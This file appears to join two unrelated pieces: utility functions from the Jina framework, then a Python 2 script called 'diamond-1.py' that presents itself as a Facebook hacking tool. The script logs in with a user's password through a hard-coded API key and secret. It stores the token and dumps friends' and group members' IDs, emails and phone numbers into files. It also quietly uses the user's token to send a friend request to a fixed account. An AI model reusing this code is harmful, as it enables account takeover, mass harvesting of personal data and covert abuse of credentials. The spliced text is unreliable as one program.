def is_valid_local_config_source(path: str) -> bool:
# TODO: this function must be refactored before 1.0 (Han 12.22)
"""
Check if the path is valid.
:param path: Local file path.
:return: True if the path is valid else False.
"""
try:
from .jaml import parse_config_source
parse_config_source(path)
return True
except FileNotFoundError:
return False
def get_full_version() -> Optional[Tuple[Dict, Dict]]:
"""
Get the version of libraries used in Jina and environment variables.
:return: Version information and environment variables
"""
import os, grpc, zmq, numpy, google.protobuf, yaml, platform
from . import (
__version__,
__proto_version__,
__jina_env__,
__uptime__,
__unset_msg__,
)
from google.protobuf.internal import api_implementation
from grpc import _grpcio_metadata
from jina.logging.predefined import default_logger
from uuid import getnode
try:
info = {
'jina': __version__,
'jina-proto': __proto_version__,
'jina-vcs-tag': os.environ.get('JINA_VCS_VERSION', __unset_msg__),
'libzmq': zmq.zmq_version(),
'pyzmq': numpy.__version__,
'protobuf': google.protobuf.__version__,
'proto-backend': api_implementation._default_implementation_type,
'grpcio': getattr(grpc, '__version__', _grpcio_metadata.__version__),
'pyyaml': yaml.__version__,
'python': platform.python_version(),
'platform': platform.system(),
'platform-release': platform.release(),
'platform-version': platform.version(),
'architecture': platform.machine(),
'processor': platform.processor(),
'uid': getnode(),
'session-id': str(random_uuid(use_uuid1=True)),
'uptime': __uptime__,
'ci-vendor': get_ci_vendor() or __unset_msg__,
}
env_info = {k: os.getenv(k, __unset_msg__) for k in __jina_env__}
full_version = info, env_info
except Exception as e:
default_logger.error(str(e))
full_version = None
return full_version
def format_full_version_info(info: Dict, env_info: Dict) -> str:
"""
Format the version information.
:param info: Version information of Jina libraries.
:param env_info: The Jina environment variables.
:return: Formatted version information.
"""
version_info = '\n'.join(f'- {k:30s}{v}' for k, v in info.items())
env_info = '\n'.join(f'* {k:30s}{v}' for k, v in env_info.items())
return version_info + '\n' + env_info
def _update_policy():
if __windows__:
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
elif 'JINA_DISABLE_UVLOOP' in os.environ:
return
else:
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ModuleNotFoundError:
warnings.warn(
'Install `uvloop` via `pip install "jina[uvloop]"` for better performance.'
)
def get_or_reuse_loop():
"""
Get a new eventloop or reuse the current opened eventloop.
:return: A new eventloop or reuse the current opened eventloop.
"""
try:
loop = asyncio.get_running_loop()
if loop.is_closed():
raise RuntimeError
except RuntimeError:
_update_policy()
# no running event loop
# create a new loop
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop
def typename(obj):
"""
Get the typename of object.
:param obj: Target object.
:return: Typename of the obj.
"""
if not isinstance(obj, type):
obj = obj.__class__
try:
return f'{obj.__module__}.{obj.__name__}'
except AttributeError:
return str(obj)
class CatchAllCleanupContextManager:
"""
This context manager guarantees, that the :method:``__exit__`` of the
sub context is called, even when there is an Exception in the
:method:``__enter__``.
:param sub_context: The context, that should be taken care of.
"""
def __init__(self, sub_context):
self.sub_context = sub_context
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type:
self.sub_context.__exit__(exc_type, exc_val, exc_tb)
class cached_property:
"""The decorator to cache property of a class."""
def __init__(self, func):
"""
Create the :class:`cached_property`.
:param func: Cached function.
"""
self.func = func
def __get__(self, obj, cls):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
return cached_value
value = obj.__dict__[f'CACHED_{self.func.__name__}'] = self.func(obj)
return value
def __delete__(self, obj):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
if hasattr(cached_value, 'close'):
cached_value.close()
del obj.__dict__[f'CACHED_{self.func.__name__}']
class _cache_invalidate:
"""Class for cache invalidation, remove strategy.
:param func: func to wrap as a decorator.
:param attribute: String as the function name to invalidate cached
data. E.g. in :class:`cached_property` we cache data inside the class obj
with the `key`: `CACHED_{func.__name__}`, the func name in `cached_property`
is the name to invalidate.
"""
def __init__(self, func, attribute: str):
self.func = func
self.attribute = attribute
def __call__(self, *args, **kwargs):
obj = args[0]
cached_key = f'CACHED_{self.attribute}'
if cached_key in obj.__dict__:
del obj.__dict__[cached_key] # invalidate
self.func(*args, **kwargs)
def __get__(self, obj, cls):
from functools import partial
return partial(self.__call__, obj)
def cache_invalidate(attribute: str):
"""The cache invalidator decorator to wrap the method call.
Check the implementation in :class:`_cache_invalidate`.
:param attribute: The func name as was stored in the obj to invalidate.
:return: wrapped method.
"""
def _wrap(func):
return _cache_invalidate(func, attribute)
return _wrap
def get_now_timestamp():
"""
Get the datetime.
:return: The datetime in int format.
"""
now = datetime.now()
return int(datetime.timestamp(now))
def get_readable_time(*args, **kwargs):
"""
Get the datetime in human readable format (e.g. 115 days and 17 hours and 46 minutes and 40 seconds).
For example:
.. highlight:: python
.. code-block:: python
get_readable_time(seconds=1000)
:param args: arguments for datetime.timedelta
:param kwargs: key word arguments for datetime.timedelta
:return: Datetime in human readable format.
"""
import datetime
secs = float(datetime.timedelta(*args, **kwargs).total_seconds())
units = [('day', 86400), ('hour', 3600), ('minute', 60), ('second', 1)]
parts = []
for unit, mul in units:
if secs / mul >= 1 or mul == 1:
if mul > 1:
n = int(math.floor(secs / mul))
secs -= n * mul
else:
n = int(secs)
parts.append(f'{n} {unit}' + ('' if n == 1 else 's'))
return ' and '.join(parts)
def get_internal_ip():
"""
Return the private IP address of the gateway for connecting from other machine in the same network.
:return: Private IP address.
"""
import socket
ip = '127.0.0.1'
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
pass
return ip
def get_public_ip(timeout: float = 0.3):
"""
Return the public IP address of the gateway for connecting from other machine in the public network.
:param timeout: the seconds to wait until return None.
:return: Public IP address.
.. warn::
Set :param:`timeout` to a large number will block the Flow.
"""
import urllib.request
results = []
def _get_ip(url):
try:
req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
with urllib.request.urlopen(req, timeout=timeout) as fp:
_ip = fp.read().decode()
results.append(_ip)
except:
pass # intentionally ignored, public ip is not showed
ip_server_list = [
'https://api.ipify.org',
'https://ident.me',
'https://checkip.amazonaws.com/',
]
threads = []
for idx, ip in enumerate(ip_server_list):
t = threading.Thread(target=_get_ip, args=(ip,))
threads.append(t)
t.start()
for t in threads:
t.join(timeout)
for r in results:
if r:
return r
def convert_tuple_to_list(d: Dict):
"""
Convert all the tuple type values from a dict to list.
:param d: Dict type of data.
"""
for k, v in d.items():
if isinstance(v, tuple):
d[k] = list(v)
elif isinstance(v, dict):
convert_tuple_to_list(v)
def is_jupyter() -> bool: # pragma: no cover
"""
Check if we're running in a Jupyter notebook, using magic command `get_ipython` that only available in Jupyter.
:return: True if run in a Jupyter notebook else False.
"""
try:
get_ipython # noqa: F821
except NameError:
return False
shell = get_ipython().__class__.__name__ # noqa: F821
if shell == 'ZMQInteractiveShell':
return True # Jupyter notebook or qtconsole
elif shell == 'Shell':
return True # Google colab
elif shell == 'TerminalInteractiveShell':
return False # Terminal running IPython
else:
return False # Other type (?)
def run_async(func, *args, **kwargs):
"""Generalized asyncio.run for jupyter notebook.
When running inside jupyter, an eventloop is already exist, can't be stopped, can't be killed.
Directly calling asyncio.run will fail, as This function cannot be called when another asyncio event loop
is running in the same thread.
.. see_also:
https://stackoverflow.com/questions/55409641/asyncio-run-cannot-be-called-from-a-running-event-loop
call `run_async(my_function, any_event_loop=True, *args, **kwargs)` to enable run with any eventloop
:param func: function to run
:param args: parameters
:param kwargs: key-value parameters
:return: asyncio.run(func)
"""
any_event_loop = kwargs.pop('any_event_loop', False)
class _RunThread(threading.Thread):
"""Create a running thread when in Jupyter notebook."""
def run(self):
"""Run given `func` asynchronously."""
self.result = asyncio.run(func(*args, **kwargs))
try:
loop = asyncio.get_running_loop()
except RuntimeError:
loop = None
if loop and loop.is_running():
# eventloop already exist
# running inside Jupyter
if any_event_loop or is_jupyter():
thread = _RunThread()
thread.start()
thread.join()
try:
return thread.result
except AttributeError:
from .excepts import BadClient
raise BadClient(
'something wrong when running the eventloop, result can not be retrieved'
)
else:
raise RuntimeError(
'you have an eventloop running but not using Jupyter/ipython, '
'this may mean you are using Jina with other integration? if so, then you '
'may want to use Client/Flow(asyncio=True). If not, then '
'please report this issue here: https://github.com/jina-ai/jina'
)
else:
return asyncio.run(func(*args, **kwargs))
def slugify(value):
"""
Normalize string, converts to lowercase, removes non-alpha characters, and converts spaces to hyphens.
:param value: Original string.
:return: Processed string.
"""
s = str(value).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
def is_yaml_filepath(val) -> bool:
"""
Check if the file is YAML file.
:param val: Path of target file.
:return: True if the file is YAML else False.
"""
if __windows__:
r = r'.*.ya?ml$' # TODO: might not be exhaustive
else:
r = r'^[/\w\-\_\.]+.ya?ml$'
return re.match(r, val.strip()) is not None
def download_mermaid_url(mermaid_url, output) -> None:
"""
Download the jpg image from mermaid_url.
:param mermaid_url: The URL of the image.
:param output: A filename specifying the name of the image to be created, the suffix svg/jpg determines the file type of the output image.
"""
from urllib.request import Request, urlopen
try:
req = Request(mermaid_url, headers={'User-Agent': 'Mozilla/5.0'})
with open(output, 'wb') as fp:
fp.write(urlopen(req).read())
except:
from jina.logging.predefined import default_logger
default_logger.error(
'can not download image, please check your graph and the network connections'
)
def find_request_binding(target):
"""Find `@request` decorated methods in a class.
:param target: the target class to check
:return: a dictionary with key as request type and value as method name
"""
import ast, inspect
from . import __default_endpoint__
res = {}
def visit_function_def(node):
for e in node.decorator_list:
req_name = ''
if isinstance(e, ast.Call) and e.func.id == 'requests':
req_name = e.keywords[0].value.s
elif isinstance(e, ast.Name) and e.id == 'requests':
req_name = __default_endpoint__
if req_name:
if req_name in res:
raise ValueError(
f'you already bind `{res[req_name]}` with `{req_name}` request'
)
else:
res[req_name] = node.name
V = ast.NodeVisitor()
V.visit_FunctionDef = visit_function_def
V.visit(compile(inspect.getsource(target), '?', 'exec', ast.PyCF_ONLY_AST))
return res
def dunder_get(_dict: Any, key: str) -> Any:
"""Returns value for a specified dunderkey
A "dunderkey" is just a fieldname that may or may not contain
double underscores (dunderscores!) for referencing nested keys in
a dict. eg::
>>> data = {'a': {'b': 1}}
>>> dunder_get(data, 'a__b')
1
key 'b' can be referrenced as 'a__b'
:param _dict : (dict, list, struct or object) which we want to index into
:param key : (str) that represents a first level or nested key in the dict
:return: (mixed) value corresponding to the key
"""
try:
part1, part2 = key.split('__', 1)
except ValueError:
part1, part2 = key, ''
try:
part1 = int(part1) # parse int parameter
except ValueError:
pass
from google.protobuf.struct_pb2 import ListValue
from google.protobuf.struct_pb2 import Struct
from google.protobuf.pyext._message import MessageMapContainer
if isinstance(part1, int):
result = _dict[part1]
elif isinstance(_dict, (Iterable, ListValue)):
result = _dict[part1]
elif isinstance(_dict, (dict, Struct, MessageMapContainer)):
if part1 in _dict:
result = _dict[part1]
else:
result = None
else:
result = getattr(_dict, part1)
return dunder_get(result, part2) if part2 else result
if False:
from fastapi import FastAPI
def extend_rest_interface(app: 'FastAPI') -> 'FastAPI':
"""Extend Jina built-in FastAPI instance with customized APIs, routing, etc.
:param app: the built-in FastAPI instance given by Jina
:return: the extended FastAPI instance
.. highlight:: python
.. code-block:: python
def extend_rest_interface(app: 'FastAPI'):
@app.get('/extension1')
async def root():
return {"message": "Hello World"}
return app
"""
return app
def get_ci_vendor() -> Optional[str]:
from jina import __resources_path__
with open(os.path.join(__resources_path__, 'ci-vendors.json')) as fp:
all_cis = json.load(fp)
for c in all_cis:
if isinstance(c['env'], str) and c['env'] in os.environ:
return c['constant']
elif isinstance(c['env'], dict):
for k, v in c['env'].items():
if os.environ.get(k, None) == v:
return c['constant']
elif isinstance(c['env'], list):
for k in c['env']:
if k in os.environ:
return c['constant']
|
diamond-1.py
|
#!/usr/bin/python
# coding=utf-8
#jangan di recode ngentot
#recode jomblo seumur hidup
# (MR.K7C8NG) PEMBUAT
#SUBSCRIBE CHANNEL mrk7c8ng-ices
#FOLLOW INSTAGRAM @pranata_pasha
#Import module
import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system("pip2 install mechanize")
try:
import requests
except ImportError:
os.system("pip2 install requests")
from requests.exceptions import ConnectionError
from mechanize import Browser
#-Setting-#
########
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent','Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
#-Keluar-#
def keluar():
print "\033[1;91m[!] Exit"
os.sys.exit()
#-Warna-#
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
#-Animasi-#
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """\033[1;96m█████████
\033[1;96m█▄█████▄█ \033[1;91m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●
\033[1;96m█\033[1;91m▼▼▼▼▼ \033[1;95m- _ --_--\033[1;95m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗
\033[1;96m█ \033[1;92m \033[1;95m_-_-- -_ --__\033[1;93m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗
\033[1;96m█\033[1;91m▲▲▲▲▲\033[1;95m-- - _ --\033[1;96m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \033[1;96mGOLD-SETAN
\033[1;96m█████████ \033[1;92m«----------✧----------»
\033[1;96m ██ ██
\033[1;96m╔══════════════════════════════════════════════╗
\033[1;96m║\033[1;96m* \033[1;95mAuthor \033[1;93m: \033[1;95mBrother•MR.K7C8NG \033[1;96m ║
\033[1;96m║\033[1;96m* \033[1;96mGitHub \033[1;93m: \033[1;96m\033[4mhttps://github.com/pashayogi\033[0m \033[1;96m ║
\033[1;96m║\033[1;96m*\033[1;93mYOUTUBE \033[1;93m: \033[1;91m\033mhttps://youtube.com/c/mrk7c8ng\033[0m \033[1;96m ║
\033[1;96m║\033[1;97m*\033[1;97mINSTAGRAM\033[1;92m: \033[1;96m\033m@pranata_pasha\033[0m \033[1;96m ║
\033[1;96m╚══════════════════════════════════════════════╝"""
# titik #
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[●] \033[1;92mLoading \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
gagal = []
idteman = []
idfromteman = []
idmem = []
emmem = []
nomem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
##### LICENSE #####
#=================#
def lisensi():
os.system('reset')
masuk()
##### Pilih Login #####
def masuk():
os.system('reset')
print logo
print "\033[1;91m║--\033[1;91m> \033[1;95m1.\033[1;96m Login"
print "\033[1;92m║--\033[1;91m> \033[1;95m2.\033[1;96m Login using token"
print "\033[1;93m║--\033[1;91m> \033[1;95m0.\033[1;96m Exit"
print "\033[1;95m║"
msuk = raw_input("\033[1;96m╚═\033[1;1mD \033[1;93m")
if msuk =="":
print"\033[1;91m[!] Wrong input"
keluar()
elif msuk =="1":
login()
elif msuk =="2":
tokenz()
elif msuk =="0":
keluar()
else:
print"\033[1;91m[!] Wrong input"
keluar()
##### LOGIN #####
#================#
def login():
os.system('reset')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('reset')
print logo
print('\033[1;96m[☆] \033[1;92mLOGIN AKUN FACEBOOK \033[1;91m[☆]')
id = raw_input('\033[1;91m[+] \033[1;36mID\033[1;97m|\033[1;96mEmail\033[1;97m \033[1;91m:\033[1;92m ')
pwd = getpass.getpass('\033[1;95m[+] \033[1;93mPassword \033[1;93m:\033[1;95m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;91m[!] No connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
zedd = open("login.txt", 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mLogin successfully'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
os.system('xdg-open https://github.com/CrazyLolz100')
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;91m[!] No connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;91m[!] \033[1;93mAccount Checkpoint")
print("\n\033[1;92m[#] Harap Login Ulang !")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;91m[!] Login Failed")
os.system('rm -rf login.txt')
time.sleep(1)
login()
##### TOKEN #####
def tokenz():
os.system('reset')
print logo
toket = raw_input("\033[1;91m[?] \033[1;92mToken\033[1;91m : \033[1;97m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
menu()
except KeyError:
print "\033[1;91m[!] Wrong"
e = raw_input("\033[1;91m[?] \033[1;92mWant to pick up token?\033[1;97m[y/n]: ")
if e =="":
keluar()
elif e =="y":
login()
else:
keluar()
##### MENU ##########################################
def menu():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('reset')
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('reset')
print"\033[1;91m[!] \033[1;93mAccount Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] No connection"
keluar()
os.system("reset")
print logo
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m"
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m ID \033[1;91m: \033[1;92m"+id
print "\033[1;97m╚"+40*"═"
print "\033[1;94m║--\033[1;91m> \033[1;93m1.\033[1;95m User information"
print "\033[1;94m║--\033[1;91m> \033[1;93m2.\033[1;95m Get Id/email/hp"
print "\033[1;94m║--\033[1;91m> \033[1;93m3.\033[1;95m Hack facebook account "
print "\033[1;94m║--\033[1;91m> \033[1;93m4.\033[1;95m Bot "
print "\033[1;94m║--\033[1;91m> \033[1;93m5.\033[1;95m Others "
print "\033[1;94m║--\033[1;91m> \033[1;93m6.\033[1;95m Show token "
print "\033[1;94m║--\033[1;91m> \033[1;93m7.\033[1;95m Delete trash "
print "\033[1;94m║--\033[1;91m> \033[1;93m8.\033[1;95m LogOut "
print "\033[1;94m║--\033[1;91m> \033[1;93m0.\033[1;95m Exit the programs "
print "║"
pilih()
#-
def pilih():
zedd = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if zedd =="":
print "\033[1;91m[!] Wrong input"
pilih()
elif zedd =="1":
informasi()
elif zedd =="2":
dump()
elif zedd =="3":
menu_hack()
elif zedd =="4":
menu_bot()
elif zedd =="5":
lain()
elif zedd =="6":
os.system('reset')
print logo
toket=open('login.txt','r').read()
print "\033[1;91m[+] \033[1;92mYour token\033[1;91m :\033[1;97m "+toket
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
elif zedd =="7":
os.remove('out')
elif zedd =="8":
os.system('rm -rf login.txt')
os.system('xdg-open https://github.com/apaansihasw779')
keluar()
elif zedd =="0":
keluar()
else:
print "\033[1;91m[!] Wrong input"
pilih()
##### INFO #####
def informasi():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
aid = raw_input('\033[1;91m[+] \033[1;92mEnter ID\033[1;97m/\033[1;92mName\033[1;91m : \033[1;97m')
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 42*"\033[1;97m═"
try:
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+z['name']
except KeyError: print '\033[1;91m[?] \033[1;92mName\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;91m[?] \033[1;92mID\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;91m[?] \033[1;92mEmail\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mTelephone\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;91m[?] \033[1;92mTelephone\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mLocation\033[1;97m : '+z['location']['name']
except KeyError: print '\033[1;91m[?] \033[1;92mLocation\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mDate of birth\033[1;97m : '+z['birthday']
except KeyError: print '\033[1;91m[?] \033[1;92mDate of birth\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mSchool\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mNot found'
except KeyError: pass
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
else:
pass
else:
print"\033[1;91m[✖] User not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
##### DUMP #####
def dump():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Get ID friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Get ID friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Get ID Search"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Get group member ID"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Get group member email"
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Get group member phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Get email friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m8.\033[1;97m Get email friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m9.\033[1;97m Get a friend's phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m10.\033[1;97m Get a friend's phone number from friend"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
dump_pilih()
#-----pilih
def dump_pilih():
cuih = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if cuih =="":
print "\033[1;91m[!] Wrong input"
dump_pilih()
elif cuih =="1":
id_teman()
elif cuih =="2":
idfrom_teman()
elif cuih =="3":
os.system('reset')
print "\033[1;91mSegera"
keluar()
elif cuih =="4":
id_member_grup()
elif cuih =="5":
em_member_grup()
elif cuih =="6":
no_member_grup()
elif cuih =="7":
email()
elif cuih =="8":
emailfrom_teman()
elif cuih =="9":
nomor_hp()
elif cuih =="10":
hpfrom_teman()
elif cuih =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
dump_pilih()
##### ID TEMAN #####
def id_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r=requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman.txt','w')
for a in z['data']:
idteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM TEMAN #####
def idfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r=requests.get("https://graph.facebook.com/"+idt+"?fields=friends.limit(5000)&access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman_from_teman.txt','w')
for a in z['friends']['data']:
idfromteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM MEMBER GRUP #####
def id_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
